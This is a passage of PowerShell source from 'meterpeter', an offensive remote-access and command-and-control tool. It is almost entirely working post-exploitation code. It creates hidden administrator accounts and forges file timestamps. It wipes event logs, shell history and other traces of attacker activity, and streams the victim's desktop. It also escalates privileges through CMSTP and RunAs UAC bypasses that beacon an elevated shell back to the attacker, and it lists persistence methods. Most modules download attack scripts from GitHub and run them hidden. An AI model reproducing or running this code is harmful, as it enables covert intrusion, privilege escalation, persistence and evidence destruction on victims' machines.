dellog.txt;remove-item dellog.txt -Force}else{echo `\" `> Error: none weak permissions found [ Rotten Potato ] ..`\" `> test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Remove-Item dellog.txt -Force}}\";\r\n }\r\n If($my_choise -ieq \"Return\" -or $my_choise -ieq \"return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"modules\" -or $my_choise -ieq \"clear\")\r\n {\r\n $RfPath = $Null;\r\n $Command = $Null;\r\n $my_choise = $Null;\r\n $Group_Attr = $Null;\r\n }\r\n }\r\n If($choise -ieq \"HideUser\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module query, create or delete windows hidden accounts.\"\r\n write-host \" It also allow to set the account 'Visible' or 'Hidden' state.\"\r\n write-host \" Warning: Create account requires 'LanmanWorkstation' service running\" -ForegroundColor Yellow\r\n write-host \" or else the account created will not inherit admin privileges token.\" -ForegroundColor Yellow\r\n write-host \" Manual check: :meterpeter> Get-Service LanmanWorkstation\" -ForegroundColor Blue\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Query Query all accounts UserLand\";\r\n write-host \" Create Create hidden account \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Delete Delete hidden account \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:HideUser> \" -NoNewline -ForeGroundColor Green;\r\n $AccManager_choise = Read-Host;\r\n If($AccManager_choise -ieq \"Query\")\r\n {\r\n Write-Host \" * Enumerating user accounts.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Query;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force\"\r\n }\r\n If($AccManager_choise -ieq \"Create\")\r\n {\r\n Write-Host \" - Input account name:\" -ForeGroundColor Red -NoNewline\r\n $AccountName = Read-Host\r\n Write-Host \" - Input account pass:\" -ForeGroundColor Red -NoNewline\r\n $password = Read-Host\r\n Write-Host \" - Account State (hidden|visible):\" -ForeGroundColor Red -NoNewline\r\n $AccountState = Read-Host\r\n Write-Host \" * Create new user account\" -ForegroundColor Green\r\n If(-not($AccountState) -or $AccountState -ieq $null){$AccountState = \"hidden\"}Else{$AccountState = \"visible\"}\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Create -UserName $AccountName -Password $password -State $AccountState;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force}Else{echo `\"`\";echo `\" `> Error: Administrator privileges required!`\"|Out-File `$Env:TMP\\hidenUser.meterpeter;Get-Content -Path `$Env:TMP\\hidenUser.meterpeter;Remove-Item -Path `$Env:TMP\\hidenUser.meterpeter -Force}\"\r\n }\r\n If($AccManager_choise -ieq \"Delete\")\r\n {\r\n Write-Host \" - Input account name: \" -NoNewline -ForegroundColor Red;\r\n $AccountName = Read-Host;Write-Host \" * Delete '$AccountName' user account\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Delete -UserName $AccountName;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force}Else{echo `\" `> Error: Administrator privileges required!`\"|Out-File `$Env:TMP\\hidenUser.meterpeter;Get-Content -Path `$Env:TMP\\hidenUser.meterpeter;Remove-Item -Path `$Env:TMP\\hidenUser.meterpeter -Force}\"\r\n }\r\n If($AccManager_choise -ieq \"Return\" -or $AccManager_choise -ieq \"cls\" -or $AccManager_choise -ieq \"modules\" -or $AccManager_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $AccManager_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"TimeStamp\" -or $choise -ieq \"mace\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module modify sellected file mace propertys:\"\r\n write-host \" CreationTime, LastAccessTime and LastWriteTime ..\" -ForegroundColor DarkYellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" check existing file timestamp UserLand\";\r\n write-host \" Modify existing file timestamp UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Mace> \" -NoNewline -ForeGroundColor Green;\r\n $timestamp_choise = Read-Host;\r\n If($timestamp_choise -ieq \"check\")\r\n {\r\n Write-Host \" - File\\Folder absolucte path: \" -ForeGroundColor Red -NoNewline\r\n $FileMace = Read-Host\r\n If([string]::IsNullOrEmpty($FileMace))\r\n {\r\n $FileMace = \"`$pwd\"\r\n write-host \" => Error: wrong input, default to $FileMace\" -ForegroundColor Red\r\n Start-Sleep -Milliseconds 700\r\n }\r\n\r\n Write-Host \" * Print $FileMace timestamp(s)\" -ForegroundColor Green\r\n $Command = \"If(-not(Test-Path -Path `\"$FileMace`\" -EA SilentlyContinue)){echo `\"`n NotFound: $FileMace`\"}Else{Get-ChildItem -Path `\"$FileMace`\"|Select-Object @{Name='State';Expression={'Current timestamp'}},Attributes,Name,Directory,CreationTime,LastAccessTime,LastWriteTime}\"\r\n }\r\n If($timestamp_choise -ieq \"Modify\")\r\n {\r\n Write-Host \" - The file to modify absolucte path: \" -ForeGroundColor Red -NoNewline\r\n $FileMace = Read-Host\r\n Write-Host \" - The Date (08 March 1999 19:19:19): \" -NoNewline\r\n $DateMace = Read-Host\r\n If(-not($DateMace) -or $DateMace -eq $null)\r\n {\r\n $DateMace = \"08 March 1999 19:19:19\"\r\n write-host \" => Error: wrong input, default to $DateMace\" -ForeGroundColor red \r\n }\r\n\r\n Write-Host \" * Modify sellected file timestamp\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/FileMace.ps1`\" -OutFile `\"`$Env:TMP\\FileMace.ps1`\"|Out-NUll;powershell -WindowStyle hidden -file `$Env:TMP\\FileMace.ps1 -FileMace `\"$FileMace`\" -Date `\"$DateMace`\";Start-Sleep -Seconds 4;Remove-Item -Path `\"`$Env:TMP\\FileMace.ps1`\" -Force\"\r\n }\r\n If($timestamp_choise -ieq \"Return\" -or $timestamp_choise -ieq \"cls\" -or $timestamp_choise -ieq \"modules\" -or $timestamp_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $timestamp_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Artifacts\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module deletes attacker activity (artifacts) on target system by\"\r\n write-host \" deleting .tmp, .log, .ps1 from %tmp% and eventvwr logfiles from snapin\"\r\n write-host \" Remark: Administrator privs required to clean eventvwr + Restore Points\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Query query eventvwr logs UserLand\"\r\n write-host \" Clean clean system tracks UserLand\\\" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Paranoid clean tracks paranoid UserLand\\\" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Artifacts> \" -NoNewline -ForeGroundColor Green;\r\n $track_choise = Read-Host;\r\n If($track_choise -ieq \"Query\")\r\n {\r\n Write-Host \" * Query main eventvwr logs\" -ForegroundColor Green\r\n $Command = \"Get-WinEvent -ListLog * -ErrorAction Ignore|Where-Object { `$_.LogName -iMatch '(AMS`I|UAC|`^Application`$|DeviceGuard/Operational`$|Regsvr32/Operational`$|Windows Defender|WMI-Activity/Operational`$|AppLocker/Exe and DLL`$|AppLocker/MSI and Script`$|`^windows powershell`$|`^Microsoft-Windows-PowerShell/Operational`$|Bits-Client/Operational`$|TCPIP)' -and `$_.LogName -iNotMatch '(/Admin)$'}|Format-Table -AutoSize `> Event.txt;Get-content Event.txt;Remove-Item Event.txt -Force\";\r\n }\r\n If($track_choise -ieq \"clean\")\r\n {\r\n Write-Host \" * Cleanning remote system tracks ..`n\" -ForegroundColor Green;\r\n $MeterClient = \"$payload_name\" + \".ps1\" -Join ''\r\n $Command = \"echo `\"[*] Cleaning Temporary folder artifacts ..`\" `> `$Env:TMP\\clean.meterpeter;Remove-Item -Path `\"`$Env:TMP\\*`\" -Include *.exe,*.bat,*.vbs,*.tmp,*.log,*.ps1,*.dll,*.lnk,*.inf,*.png,*.zip -Exclude *$MeterClient* -EA SilentlyContinue -Force -Recurse;echo `\"[*] Cleaning Recent directory artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;Remove-Item -Path `\"`$Env:APPDATA\\Microsoft\\Windows\\Recent\\*`\" -Include *.exe,*.bat,*.vbs,*.log,*.ps1,*.dll,*.inf,*.lnk,*.png,*.txt,*.zip -Exclude desktop.ini -EA SilentlyContinue -Force -Recurse;echo `\"[*] Cleaning Recent documents artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R REG DELETE `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs`\" /f|Out-Null;cmd /R REG ADD `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs`\" /ve /t REG_SZ /f|Out-Null;echo `\"[*] Cleaning DNS Resolver cache artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R ipconfig /flushdns|Out-Null;If(Get-Command `\"Clear-RecycleBin`\" -EA SilentlyContinue){echo `\"[*] Cleaning recycle bin folder artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;Start-Process -WindowStyle Hidden powershell -ArgumentList `\"Clear-RecycleBin -Force`\" -Wait}Else{echo `\"[*] Cleaning recycle bin folder artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;echo `\" `> Error: 'Clear-RecycleBin' not found ..`\" `>`> `$Env:TMP\\clean.meterpeter};echo `\"[*] Cleaning ConsoleHost_history artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;`$CleanPSLogging = (Get-PSReadlineOption -EA SilentlyContinue).HistorySavePath;echo `\"MeterPeterNullArtifacts`\" `> `$CleanPSLogging;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"[*] Cleaning Cache of plugged USB devices ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R REG DELETE `\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\" /f|Out-Null;cmd /R REG ADD `\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\" /ve /t REG_SZ /f|Out-Null;echo `\"[-] Cleaning Eventvwr logfiles from snapin ..`\" `>`> `$Env:TMP\\clean.meterpeter;`$PSlist = wevtutil el | Where-Object {`$_ -iMatch '(AM`SI/Debug|UAC|Powershell|BITS|Windows Defender|WMI-Activity/Operational|AppLocker/Exe and DLL|AppLocker/MSI and Script|TCPIP/Operational)' -and `$_ -iNotMatch '(/Admin)`$'};ForEach(`$PSCategorie in `$PSlist){wevtutil cl `\"`$PSCategorie`\"|Out-Null;echo `\" deleted: `$PSCategorie`\" `>`> `$Env:TMP\\clean.meterpeter}}Else{echo `\"[x] Cleaning Eventvwr logfiles from snapin ..`\" `>`> `$Env:TMP\\clean.meterpeter;echo `\" => Error: Administrator privileges required!`\" `>`> `$Env:TMP\\clean.meterpeter};Get-Content -Path `$Env:TMP\\clean.meterpeter;Remove-Item -Path `$Env:TMP\\clean.meterpeter -Force\"\r\n }\r\n If($track_choise -ieq \"Paranoid\") \r\n {\r\n Write-Host \" - Display verbose outputs? (y|n): \" -NoNewline\r\n $StDoutStatus = Read-Host\r\n If($StDoutStatus -iMatch '^(y|yes|true)$'){$stdout = \"True\"}Else{$stdout = \"False\"}\r\n Write-Host \" - Delete Restore Points? (y|n) : \" -ForeGroundColor Red -NoNewline\r\n $RPointsStatus = Read-Host;If($RPointsStatus -iMatch '^(y|yes|true)$'){$RStdout = \"True\"}Else{$RStdout = \"False\"}\r\n Write-Host \" * Cleanning system tracks.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/CleanTracks.ps1`\" -OutFile `\"`$Env:TMP\\CleanTracks.ps1`\"|Out-Null;powershell -File `$Env:TMP\\CleanTracks.ps1 -CleanTracks Paranoid -Verb $stdout -DelRestore $RStdout;Remove-Item -Path `$Env:TMP\\CleanTracks.ps1 -EA SilentlyContinue -Force\"\r\n }\r\n If($track_choise -ieq \"Return\" -or $track_choise -ieq \"cls\" -or $track_choise -ieq \"modules\" -or $track_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $track_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Stream\")\r\n {\r\n write-host \"`n`n Requirements:\" -ForegroundColor Yellow\r\n write-host \" Mozilla firefox browser which supports MJPEG installed on attacker.\"\r\n write-host \" Streams target desktop live untill 'execution' setting its reached.\"\r\n write-host \" Remark: 30 seconds its the minimum accepted execution timer input.\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Stream target desktop UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Stream> \" -NoNewline -ForeGroundColor Green;\r\n $Stream_choise = Read-Host;\r\n If($Stream_choise -ieq \"Start\")\r\n {\r\n\r\n If(-not(Test-Path -Path \"$Env:ProgramFiles\\Mozilla Firefox\\firefox.exe\" -EA SilentlyContinue))\r\n {\r\n $Command = $Null;\r\n Write-Host \"`n abort: Stream target desktop function requires firefox.exe`n Installed on attacker machine to access the stream.\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n Else\r\n {\r\n $BindPort = \"1234\"\r\n write-host \" - Input execution time: \" -NoNewline\r\n [int]$ExecTimmer = Read-Host\r\n If($ExecTimmer -lt 30 -or $ExecTimmer -eq $null)\r\n {\r\n $ExecTimmer = \"30\"\r\n Write-Host \" => Execution to small, defaulting to 30 seconds ..\" -ForegroundColor Red\r\n Start-Sleep -Milliseconds 500\r\n }\r\n write-host \" - Input target ip addr: \" -ForeGroundColor Red -NoNewline\r\n $RemoteHost = Read-Host\r\n Write-Host \" * Streaming -[ $RemoteHost ]- Desktop Live!\" -ForegroundColor Green\r\n If(-not($RemoteHost) -or $RemoteHost -eq $null)\r\n {\r\n $RemoteHost = \"$Local_Host\" #Run stream againts our selft since none ip as inputed!\r\n }\r\n\r\n #Build output DataTable!\r\n $StreamTable = New-Object System.Data.DataTable\r\n $StreamTable.Columns.Add(\"local_host\")|Out-Null\r\n $StreamTable.Columns.Add(\"remote_host\")|Out-Null\r\n $StreamTable.Columns.Add(\"bind_port\")|Out-Null\r\n $StreamTable.Columns.Add(\"connection\")|Out-Null\r\n $StreamTable.Columns.Add(\"execution \")|Out-Null\r\n\r\n #Adding values to output DataTable!\r\n $StreamTable.Rows.Add(\"$Local_Host\",\"$RemoteHost\",\"$BindPort\",\"Bind\",\"$ExecTimmer seconds\")|Out-Null\r\n\r\n #Diplay output DataTable!\r\n Write-Host \"`n\";Start-Sleep -Milliseconds 500\r\n $StreamTable | Format-Table -AutoSize | Out-String -Stream | Select-Object -Skip 1 |\r\n Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -Match '^(local_host)'){\r\n @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n Write-Host @stringformat $_\r\n }\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Stream Target Desktop (MJPEG)\r\n\r\n .NOTES\r\n The next cmdline downloads\\imports 'Stream-TargetDesktop.ps1' into %TMP%,\r\n Import module, creates trigger.ps1 script to execute 'TargetScreen -Bind'\r\n sleeps for sellected amount of time (ExecTimmer), before stoping stream,\r\n and deleting all artifacts left behind by this function.\r\n #>\r\n\r\n #Anwsome Banner\r\n $AnwsomeBanner = @\"\r\n '-.\r\n '-. _____ \r\n .-._ | '. \r\n : .. | : \r\n '-._' | .-'\r\n / \\ .'i--i\r\n / \\ .-'_/____\\___\r\n .-' : :Stream_Desktop_Live ..\r\n---------------------------------------------------------------------\r\n\"@;Write-Host $AnwsomeBanner\r\n Write-Host \"* Start firefox on: '\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n Write-host \"http://${RemoteHost}:${BindPort}\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n Write-host \"' to access live stream!\" -ForegroundColor Red -BackgroundColor Black;\r\n $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Stream-TargetDesktop.ps1 -OutFile `$Env:TMP\\Stream-TargetDesktop.ps1|Out-Null;echo `\"Import-Module -Name `$Env:TMP\\Stream-TargetDesktop.ps1 -Force`\"|Out-File -FilePath `\"`$Env:TMP\\trigger.ps1`\" -Encoding ascii -Force;Add-Content `$Env:TMP\\trigger.ps1 `\"TargetScreen -Bind -Port $BindPort`\";Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\trigger.ps1`\"|Out-Null;Start-Sleep -Seconds $ExecTimmer;`$StreamPid = Get-Content -Path `\"`$Env:TMP\\mypid.log`\" -EA SilentlyContinue|Where-Object { `$_ -ne '' };Stop-Process -id `$StreamPid -EA SilentlyContinue -Force;Remove-Item -Path `$Env:TMP\\trigger.ps1 -Force;Remove-Item -Path `$Env:TMP\\mypid.log -Force;Remove-Item -Path `$Env:TMP\\Stream-TargetDesktop.ps1 -Force\";\r\n }\r\n\r\n }\r\n If($Stream_choise -ieq \"Return\" -or $Stream_choise -ieq \"cls\" -or $Stream_choise -ieq \"modules\" -or $Stream_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Delay_Time = $Null;\r\n $Stream_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Escalate\")\r\n {\r\n write-host \"`n`n Requirements:\" -ForegroundColor Yellow\r\n write-host \" EOP modules requires that attacker input the delay time (in seconds)\"\r\n write-host \" for client.ps1 to beacon home after the privilege escalation. Attacker\"\r\n write-host \" also needs to exit meterpeter connection and start a new listenner with\"\r\n write-host \" the same settings [LHOST+LPORT] to receive the elevated connection back.\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green\r\n write-host \" ------- ----------- ------------------\"\r\n write-host \" getadmin Escalate client privileges UserLand\"\r\n write-host \" Delete Delete getadmin artifacts UserLand\"\r\n write-host \" UACpriv use runa[s] to spawn UAC diag UserLand\"\r\n write-host \" CmdLine Uac execute command elevated UserLand\"\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Escalate> \" -NoNewline -ForeGroundColor Green\r\n $Escal_choise = Read-Host;\r\n If($Escal_choise -ieq \"UACpriv\")\r\n {\r\n $CurrentTime = (Get-Date -Format 'HH:mm')\r\n write-host \" - Input time to start eop (\" -ForeGroundColor Red -NoNewline\r\n write-host \"$CurrentTime\" -ForeGroundColor Yellow -NoNewline\r\n write-host \"): \" -ForeGroundColor Red -NoNewline\r\n\r\n $StartTime = Read-Host\r\n If(-not($StartTime -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n {\r\n write-host \" => Error: wrong time format [$StarTime]\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n write-host \" * Using RU`NAS to elevate session!`n\" -ForeGroundColor Green\r\n $Command = \"cd `$Env:TMP;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\" `> Error: Abort, session allready running under Administrator token ..`\" `> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path `$Env:TMP\\EOPsettings.log -Force}Else{Remove-Item -Path `$Env:TMP\\Programdata.log -force;iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/UACeop.ps1 -OutFile `$Env:TMP\\UACeop.ps1|Unblock-File;echo `\" `> Triger EOP function at: $StartTime hours.`\" `> `$Env:TMP\\EOPsettings.log;echo `\" Exit meterpeter connection [now] and start a new listenner`\" `>`> `$Env:TMP\\EOPsettings.log;echo `\" Using the same LHOST+LPORT to recive the connection back.`\" `>`> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path `$Env:TMP\\EOPsettings.log -Force;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file UACeop.ps1 -starttime $StartTime -attacker ${Local_Host}:${Local_Port} -autodel`\"}\"\r\n }\r\n }\r\n If($Escal_choise -ieq \"GetAdmin\")\r\n {\r\n write-host \" - Input execution delay time : \" -ForeGroundColor Red -NoNewline\r\n $DelayTime = Read-Host\r\n write-host \" - Max EOP (client) executions : \" -NoNewline\r\n $ExecRatLoop = Read-Host\r\n write-host \" - Edit client location? (y|n) : \" -NoNewline\r\n $EditRatLocation = Read-Host\r\n If($EditRatLocation -iMatch '^(y|yes|s)$')\r\n {\r\n write-host \" - Input client remote location: \" -ForeGroundColor Red -NoNewline\r\n $RatLocation = Read-Host\r\n If(-not($RatLocation) -or $RatLocation -eq $null)\r\n {\r\n $RatStdOut = \"`$Env:TMP\\Update-KB5005101.ps1\"\r\n $RatLocation = \"False\"\r\n }\r\n Else\r\n {\r\n $RatStdOut = \"$RatLocation\" \r\n }\r\n }\r\n Else\r\n {\r\n $RatStdOut = \"`$Env:TMP\\Update-KB5005101.ps1\"\r\n $RatLocation = \"False\"\r\n }\r\n\r\n If(-not($DelayTime) -or $DelayTime -lt \"30\"){$DelayTime = \"30\"}\r\n If(-not($ExecRatLoop) -or $ExecRatLoop -lt \"1\"){$ExecRatLoop = \"1\"}\r\n Write-Host \" * Elevate session from UserLand to Administrator!\" -ForegroundColor Green\r\n Write-Host \" => Downloading: UACBy`passCMSTP from GitHub into %TMP% ..`n\" -ForeGroundColor Blue\r\n Start-Sleep -Seconds 1\r\n\r\n #Build output DataTable!\r\n $mytable = New-Object System.Data.DataTable\r\n $mytable.Columns.Add(\"max_executions\")|Out-Null\r\n $mytable.Columns.Add(\"execution_delay\")|Out-Null\r\n $mytable.Columns.Add(\"rat_remote_location\")|Out-Null\r\n\r\n #Adding values to DataTable!\r\n $mytable.Rows.Add(\"$ExecRatLoop\", ## max eop executions\r\n \"$DelayTime seconds\", ## Looop each <int> seconds\r\n \"$RatStdOut\" ## rat client absoluct path\r\n )|Out-Null\r\n\r\n #Diplay output DataTable!\r\n $mytable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -Match '^(max_executions)'){\r\n @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n #Anwsome Banner\r\n $AnwsomeBanner = @\"\r\n ____\r\n __,-~~/~ `---.\r\n _/_,---( , )\r\n __ / < / ) \\___\r\n- ------===;;;'====------------------===;;;===-------- -\r\n \\/ ~\"~\"~\"~\"~\"~\\~\"~)~\"/\r\n (_ ( \\ ( > \\)\r\n \\_( _ < >_>'\r\n ~ `-i' ::>|--\"\r\n I;|.|.|\r\n <|i::|i|`.\r\n (` ^'\"`-' \") CMSTP EOP\r\n--------------------------------------------------------------------------\r\n\"@;Write-Host $AnwsomeBanner\r\n Write-Host \"* Exit *Meterpeter* and start a new Handler to recive the elevated shell..\" -ForegroundColor Red -BackgroundColor Black\r\n Write-Host \" => _EOP_ shell settings: lhost:\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n Write-Host \"$Local_Host\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n Write-Host \" lport:\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n Write-Host \"$Local_Port\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n Write-Host \" obfuscat`ion:bxor\" -ForegroundColor Red -BackgroundColor Black;\r\n\r\n #Execute Command Remote\r\n Start-Sleep -Seconds 1;$TriggerSettings = \"$Local_Host\"+\":\"+\"$Local_Port\" -join ''\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"`n`> Error: Abort, session allready running under Administrator token ..`\" `> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path `$Env:TMP\\EOPsettings.log -Force;}Else{echo `\"$TriggerSettings`\" `> `$Env:TMP\\EOPsettings.log;iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/CMSTPTrigger.ps1 -OutFile `$Env:TMP\\CMSTPTrigger.ps1|Out-Null;Start-Process -WindowStyle hidden powershell.exe -ArgumentList `\"-File `$Env:TMP\\CMSTPTrigger.ps1 -DelayTime $DelayTime -LoopFor $ExecRatLoop -RatLocation $RatLocation`\"}\"\r\n }\r\n If($Escal_choise -ieq \"Delete\" -or $Escal_choise -ieq \"del\")\r\n {\r\n Write-Host \" Delete privil`ege escalation artifacts left behind.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n\";\r\n $Command = \"Stop-Process -Name cmstp -EA SilentlyContinue;Remove-Item -Path `\"`$Env:TMP\\*`\" -Include *.log,*.ps1,*.dll,*.inf,*.bat,*.vbs -Exclude *Update-* -EA SilentlyContinue -Force|Select -SkipLast 1;echo `\" [i] meterpeter EOP artifacts successfuly deleted.`\" `> logme.log;Get-Content logme.log;Remove-Item -Path logme.log\";\r\n }\r\n If($Escal_choise -ieq \"CmdLine\")\r\n {\r\n Write-Host \" * Spawn UAC gui to run cmdline elevated.\" -ForegroundColor Green\r\n write-host \" - Input cmdline to run elevated: \" -ForeGroundColor Red -NoNewline\r\n $ElevatedCmdLine = Read-Host\r\n $Myrunes = \"r\" + \"una\" + \"s\" -join ''\r\n $Command = \"powershell -C `\"Start-Process $Env:WINDIR\\system32\\cmd.exe -ArgumentList '$ElevatedCmdLine' -verb $Myrunes`\";echo `\"`n[i] Executing: '$ElevatedCmdLine'`\" `> `$Env:TMP\\sdhsdc.log;Get-Content `$Env:TMP\\sdhsdc.log;Remove-Item -Path `\"`$Env:TMP\\sdhsdc.log`\" -Force\"\r\n }\r\n If($Escal_choise -ieq \"Return\" -or $Escal_choise -ieq \"cls\" -or $Escal_choise -ieq \"modules\" -or $Escal_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Delay_Time = $Null;\r\n $Escal_choise = $Null;\r\n $trigger_File = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Persist\" -or $choise -ieq \"persistance\")\r\n {\r\n write-host \"`n`n Requirements:\" -ForegroundColor Yellow;\r\n write-host \" Client (pay`load) must be deployed in target %TEMP% folder.\";\r\n write-host \" Meterpeter C2 must be put in listener mode (using same lhost|lport), and\";\r\n write-host \" Target machine needs to restart (startup) to beacon home at sellected time.\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Beacon\" -ForegroundColor Green -NoNewline\r\n write-host \" Persiste Client using Startup UserLand\";\r\n write-host \" ADSRUN Persiste Client using A.D.S. UserLand\";\r\n write-host \" RUNONCE Persiste Client using REG:HKCU UserLand\";\r\n write-host \" REGRUN Persiste Client using REG:HKLM \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" Schtasks Persiste Client using Schtasks \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" WinLogon Persiste Client using WinLogon \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Persistance> \" -NoNewline -ForeGroundColor Green;\r\n $startup_choise = Read-Host;\r\n If($startup_choise -ieq \"Beacon\")\r\n {\r\n $dat = Get-Date;\r\n $BeaconTime = $Null;\r\n $logfile = \"$IPATH\"+\"beacon.log\";\r\n\r\n Write-host \" - Input Time (sec) to beacon home (eg: 60): \" -ForeGroundColor Red -NoNewline;\r\n $Delay_Time = Read-Host;\r\n If(-not($Delay_Time) -or $Delay_Time -lt \"30\"){$Delay_Time = \"60\"}\r\n\r\n Write-host \" - Use target OUTLOOK to send me msg (y|n) : \" -NoNewline;\r\n 